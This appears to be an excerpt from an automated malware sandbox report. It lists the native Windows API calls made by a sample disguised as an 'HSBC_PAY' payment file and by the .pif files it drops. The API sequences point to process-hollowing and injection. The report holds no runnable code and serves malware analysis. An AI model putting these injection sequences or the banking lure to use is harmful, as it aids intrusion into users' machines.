                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A984BC NtUnmapViewOfSection,0_2_02A984BC
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02A9DAC4
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02A9DA3C
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02A9DBA8
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A98BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02A98BA8
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A979AC NtAllocateVirtualMemory,0_2_02A979AC
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A97CF8 NtWriteVirtualMemory,0_2_02A97CF8
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A98BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02A98BA6
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A979AA NtAllocateVirtualMemory,0_2_02A979AA
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02A9D9E8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0042CB13 NtClose,3_2_0042CB13
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012B60 NtClose,LdrInitializeThunk,3_2_29012B60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_29012DF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_29012C70
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290135C0 NtCreateMutant,LdrInitializeThunk,3_2_290135C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012B80 NtQueryInformationFile,3_2_29012B80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012BA0 NtEnumerateValueKey,3_2_29012BA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012BE0 NtQueryValueKey,3_2_29012BE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012BF0 NtAllocateVirtualMemory,3_2_29012BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012AB0 NtWaitForSingleObject,3_2_29012AB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012AD0 NtReadFile,3_2_29012AD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012AF0 NtWriteFile,3_2_29012AF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012D00 NtSetInformationFile,3_2_29012D00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012D10 NtMapViewOfSection,3_2_29012D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012D30 NtUnmapViewOfSection,3_2_29012D30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012DB0 NtEnumerateKey,3_2_29012DB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012DD0 NtDelayExecution,3_2_29012DD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012C00 NtQueryInformationProcess,3_2_29012C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012C60 NtCreateKey,3_2_29012C60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012CA0 NtQueryInformationToken,3_2_29012CA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012CC0 NtQueryVirtualMemory,3_2_29012CC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012CF0 NtOpenProcess,3_2_29012CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012F30 NtCreateSection,3_2_29012F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012F60 NtCreateProcessEx,3_2_29012F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012F90 NtProtectVirtualMemory,3_2_29012F90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012FA0 NtQuerySection,3_2_29012FA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012FB0 NtResumeThread,3_2_29012FB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012FE0 NtCreateFile,3_2_29012FE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012E30 NtWriteVirtualMemory,3_2_29012E30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012E80 NtReadVirtualMemory,3_2_29012E80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012EA0 NtAdjustPrivilegesToken,3_2_29012EA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29012EE0 NtQueueApcThread,3_2_29012EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29014340 NtSetContextThread,3_2_29014340
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29014650 NtSuspendThread,3_2_29014650
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290139B0 NtGetContextThread,3_2_290139B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29013D10 NtOpenProcessToken,3_2_29013D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29013D70 NtOpenThread,3_2_29013D70
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29013010 NtOpenDirectoryObject,3_2_29013010
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29013090 NtSetValueKey,3_2_29013090
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A824C NtReadVirtualMemory,5_2_029A824C
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A84BC NtUnmapViewOfSection,5_2_029A84BC
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029ADAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,5_2_029ADAC4
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029ADA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_029ADA3C
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_029A8BA8
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029ADBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,5_2_029ADBA8
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A79AC NtAllocateVirtualMemory,5_2_029A79AC
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A7CF8 NtWriteVirtualMemory,5_2_029A7CF8
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_029A8BA6
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029A79AA NtAllocateVirtualMemory,5_2_029A79AA
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029AD9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_029AD9E8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8335C0 NtCreateMutant,LdrInitializeThunk,8_2_1E8335C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_1E832C70
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_1E832DF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832B60 NtClose,LdrInitializeThunk,8_2_1E832B60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E833D10 NtOpenProcessToken,8_2_1E833D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E833D70 NtOpenThread,8_2_1E833D70
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8339B0 NtGetContextThread,8_2_1E8339B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E833090 NtSetValueKey,8_2_1E833090
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E833010 NtOpenDirectoryObject,8_2_1E833010
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832E80 NtReadVirtualMemory,8_2_1E832E80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832EA0 NtAdjustPrivilegesToken,8_2_1E832EA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832EE0 NtQueueApcThread,8_2_1E832EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832E30 NtWriteVirtualMemory,8_2_1E832E30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832F90 NtProtectVirtualMemory,8_2_1E832F90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832FA0 NtQuerySection,8_2_1E832FA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832FB0 NtResumeThread,8_2_1E832FB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832FE0 NtCreateFile,8_2_1E832FE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832F30 NtCreateSection,8_2_1E832F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832F60 NtCreateProcessEx,8_2_1E832F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832CA0 NtQueryInformationToken,8_2_1E832CA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832CC0 NtQueryVirtualMemory,8_2_1E832CC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832CF0 NtOpenProcess,8_2_1E832CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832C00 NtQueryInformationProcess,8_2_1E832C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832C60 NtCreateKey,8_2_1E832C60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832DB0 NtEnumerateKey,8_2_1E832DB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832DD0 NtDelayExecution,8_2_1E832DD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832D00 NtSetInformationFile,8_2_1E832D00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832D10 NtMapViewOfSection,8_2_1E832D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832D30 NtUnmapViewOfSection,8_2_1E832D30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832AB0 NtWaitForSingleObject,8_2_1E832AB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832AD0 NtReadFile,8_2_1E832AD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832AF0 NtWriteFile,8_2_1E832AF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832B80 NtQueryInformationFile,8_2_1E832B80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832BA0 NtEnumerateValueKey,8_2_1E832BA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832BE0 NtQueryValueKey,8_2_1E832BE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E832BF0 NtAllocateVirtualMemory,8_2_1E832BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E834650 NtSuspendThread,8_2_1E834650
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E834340 NtSetContextThread,8_2_1E834340
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A985D4 CreateProcessAsUserW,0_2_02A985D4
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A820C40_2_02A820C4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004028703_2_00402870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004010E03_2_004010E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0042F1433_2_0042F143
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040496A3_2_0040496A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004101D33_2_004101D3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004032303_2_00403230
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004012C03_2_004012C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E3CA3_2_0040E3CA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E3D33_2_0040E3D3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004103F33_2_004103F3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00416B9E3_2_00416B9E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00416BA33_2_00416BA3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E5183_2_0040E518
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040E5233_2_0040E523
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004025B03_2_004025B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC68B83_2_28FC68B8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290AA9A63_2_290AA9A6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE28403_2_28FE2840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEA8403_2_28FEA840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE29A03_2_28FE29A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF69623_2_28FF6962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900E8F03_2_2900E8F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909AB403_2_2909AB40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDEA803_2_28FDEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29096BD73_2_29096BD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0CF23_2_28FD0CF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907CD1F3_2_2907CD1F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C003_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE03_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8DBF3_2_28FF8DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB53_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD003_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29022F283_2_29022F28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29000F303_2_29000F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29082F303_2_29082F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F403_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF2E903_2_28FF2E90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905EFA03_2_2905EFA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0E593_2_28FE0E59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909EE263_2_2909EE26
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC83_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909CE933_2_2909CE93
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909EEDB3_2_2909EEDB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A1183_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290681583_2_29068158
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A01AA3_2_290A01AA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290941A23_2_290941A2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290981CC3_2_290981CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290720003_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD01003_2_28FD0100
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909A3523_2_2909A352
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A03E63_2_290A03E6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE3F03_2_28FEE3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290802743_2_29080274
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290602C03_2_290602C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A05913_2_290A0591
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290844203_2_29084420
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290924463_2_29092446
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE05353_2_28FE0535
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908E4F63_2_2908E4F6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFC6E03_2_28FFC6E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290047503_2_29004750
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDC7C03_2_28FDC7C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE07703_2_28FE0770
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290759103_2_29075910
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE38E03_2_28FE38E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904D8003_2_2904D800
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE99503_2_28FE9950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFB9503_2_28FFB950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FB763_2_2909FB76
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29055BF03_2_29055BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901DBF93_2_2901DBF9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FA493_2_2909FA49
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29097A463_2_29097A46
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29053A6C3_2_29053A6C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFFB803_2_28FFFB80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29025AA03_2_29025AA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907DAAC3_2_2907DAAC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29081AA33_2_29081AA3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908DAC63_2_2908DAC6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29091D5A3_2_29091D5A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29097D733_2_29097D73
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29059C323_2_29059C32
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFFDC03_2_28FFFDC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE3D403_2_28FE3D40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FCF23_2_2909FCF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FF093_2_2909FF09
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE9EB03_2_28FE9EB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909FFB13_2_2909FFB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FA3FD23_2_28FA3FD2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FA3FD53_2_28FA3FD5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE1F923_2_28FE1F92
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE70C03_2_28FE70C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290AB16B3_2_290AB16B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2901516C3_2_2901516C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEB1B03_2_28FEB1B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCF1723_2_28FCF172
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908F0CC3_2_2908F0CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290970E93_2_290970E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909F0E03_2_2909F0E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909132D3_2_2909132D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFB2C03_2_28FFB2C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE52A03_2_28FE52A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2902739A3_2_2902739A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCD34C3_2_28FCD34C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290812ED3_2_290812ED
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290975713_2_29097571
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD14603_2_28FD1460
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907D5B03_2_2907D5B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A95C33_2_290A95C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909F43F3_2_2909F43F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909F7B03_2_2909F7B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290256303_2_29025630
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290916CC3_2_290916CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004015603_1_00401560
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004020583_1_00402058
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004010E03_1_004010E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004032303_1_00403230
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004012C03_1_004012C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004033503_1_00403350
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004015533_1_00401553
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004025B03_1_004025B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_004028703_1_00402870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_00401D693_1_00401D69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_1_00401D703_1_00401D70
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: 5_2_029920C45_2_029920C4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E809EB08_2_1E809EB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E801F928_2_1E801F92
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFFB18_2_1E8BFFB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFF098_2_1E8BFF09
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7C3FD58_2_1E7C3FD5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7C3FD28_2_1E7C3FD2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFCF28_2_1E8BFCF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E879C328_2_1E879C32
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81FDC08_2_1E81FDC0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E803D408_2_1E803D40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B1D5A8_2_1E8B1D5A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B7D738_2_1E8B7D73
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E845AA08_2_1E845AA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89DAAC8_2_1E89DAAC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A1AA38_2_1E8A1AA3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8ADAC68_2_1E8ADAC6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFA498_2_1E8BFA49
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B7A468_2_1E8B7A46
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E873A6C8_2_1E873A6C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81FB808_2_1E81FB80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E875BF08_2_1E875BF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E83DBF98_2_1E83DBF9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BFB768_2_1E8BFB76
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8038E08_2_1E8038E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E86D8008_2_1E86D800
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8959108_2_1E895910
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8099508_2_1E809950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81B9508_2_1E81B950
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B16CC8_2_1E8B16CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8456308_2_1E845630
